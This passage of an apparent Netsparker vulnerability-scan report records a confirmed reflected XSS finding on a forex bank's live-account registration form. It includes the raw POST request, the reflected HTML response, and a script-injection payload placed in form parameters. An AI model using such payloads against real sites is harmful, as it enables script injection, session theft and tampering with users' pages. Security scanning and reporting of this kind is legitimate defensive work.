          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[serviceProvider]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00018A)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BservProviderAnswer%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0001A6)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 299
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BservProviderAnswer%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001A6)%3c%2fscript%3e&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
